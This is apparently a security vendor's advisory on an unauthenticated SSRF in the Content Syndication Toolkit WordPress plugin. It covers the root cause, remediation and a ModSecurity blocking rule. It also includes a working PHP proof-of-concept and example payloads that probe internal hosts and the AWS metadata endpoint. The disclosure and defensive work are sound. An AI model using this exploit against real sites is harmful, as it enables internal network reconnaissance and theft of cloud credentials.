Atomic Edge analysis of CVE-2026-3478 (metadata-based):
This vulnerability is an unauthenticated Server-Side Request Forgery (SSRF) in the Content Syndication Toolkit WordPress plugin, version 1.3 and earlier. The flaw resides in a proxy endpoint registered via the plugin’s bundled ReduxFramework library. The vulnerability has a CVSS score of 7.2 (High), indicating a significant risk to confidentiality and integrity with network scope changes.
Atomic Edge research identifies the root cause as an AJAX handler registered with the `wp_ajax_nopriv_redux_p` hook. This hook makes the endpoint accessible to unauthenticated users. The handler’s `proxy()` method directly accepts a `url` parameter from the `$_GET` superglobal. The description confirms a validation regex of `/.*/` is used, which matches any input. This unsanitized URL is passed to `wp_remote_request()`, which lacks the internal host restrictions present in `wp_safe_remote_request()`. The absence of capability checks, nonce verification, and URL allowlisting creates the SSRF condition. These conclusions are inferred from the CWE classification and the provided vulnerability description, as the source code is not available for direct review.
Exploitation requires an attacker to send a crafted GET request to the site’s WordPress AJAX endpoint. The target is `/wp-admin/admin-ajax.php`. The attacker must set the `action` parameter to `redux_p` and the `url` parameter to any internal or external address. For example, an attacker could probe the local network with `url=http://192.168.1.1:8080/` or access cloud metadata services with `url=http://169.254.169.254/latest/meta-data/`. The server will execute the request and return the full response body to the attacker, enabling information disclosure.
Effective remediation requires multiple layers of security controls. The AJAX action must be registered only for authenticated users by using `wp_ajax_redux_p` instead of `wp_ajax_nopriv_redux_p`. The handler must implement a capability check, such as `current_user_can(‘manage_options’)`. A nonce verification should be added to prevent CSRF attacks. Most critically, the URL parameter must be strictly validated. The plugin should implement an allowlist of permitted domains or, at minimum, use `wp_safe_remote_request()` to block requests to internal IPs and private networks. Input validation should reject URLs that do not match a predefined, safe pattern.
The impact of successful exploitation is significant. Attackers can use the vulnerable server as a proxy to scan internal networks, potentially discovering other vulnerable services. They can interact with internal APIs that are not exposed to the internet, leading to data modification or theft. Access to cloud instance metadata endpoints can result in the compromise of access keys and full cloud account takeover. The full-read nature of the SSRF allows attackers to exfiltrate sensitive data from these internal sources directly.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-3478 (metadata-based)
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php"
"id:20263478,phase:2,deny,status:403,chain,msg:'CVE-2026-3478: Unauthenticated SSRF via Content Syndication Toolkit redux_p AJAX action',severity:'CRITICAL',tag:'CVE-2026-3478',tag:'WordPress',tag:'Plugin-Content-Syndication-Toolkit',tag:'Attack/SSRF'"
SecRule ARGS_GET:action "@streq redux_p" "chain"
SecRule ARGS_GET:url "@rx ^(http|https)://"
"setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',setvar:'tx.ssrf_score=+%{tx.critical_anomaly_score}'"
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-3478 - Content Syndication Toolkit <= 1.3 - Unauthenticated Server-Side Request Forgery via 'url' Parameter
<?php
$target_url = 'https://vulnerable-wordpress-site.com';
// The vulnerable AJAX endpoint
$ajax_endpoint = '/wp-admin/admin-ajax.php';
// The vulnerable action parameter value
$action = 'redux_p';
// The internal target to probe via SSRF (example: localhost port 8080)
$internal_target = 'http://127.0.0.1:8080/';
// Construct the full exploit URL
$exploit_url = $target_url . $ajax_endpoint . '?action=' . urlencode($action) . '&url=' . urlencode($internal_target);
echo "[*] Atomic Edge SSRF PoC for CVE-2026-3478n";
echo "[*] Target: $target_urln";
echo "[*] Probing: $internal_targetn";
echo "[*] Sending request to: $exploit_urlnn";
// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// Follow redirects if the target does
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
// Set a user-agent to mimic a regular browser
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Atomic Edge Research)');
// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$error = curl_error($ch);
curl_close($ch);
if ($error) {
echo "[!] cURL Error: $errorn";
} else {
echo "[+] HTTP Response Code: $http_coden";
echo "[+] Response Body (first 2000 chars):nn";
echo substr($response, 0, 2000) . "n";
if (strlen($response) > 2000) {
echo "... (truncated)n";
}
}
// Example alternative payloads for different attack scenarios
/*
// Cloud metadata endpoint (AWS)
$payload_aws = 'http://169.254.169.254/latest/meta-data/';
// Internal network scan
$payload_scan = 'http://192.168.1.100:22/';
// Sensitive internal service
$payload_service = 'http://internal-api.local/admin';
*/
?>
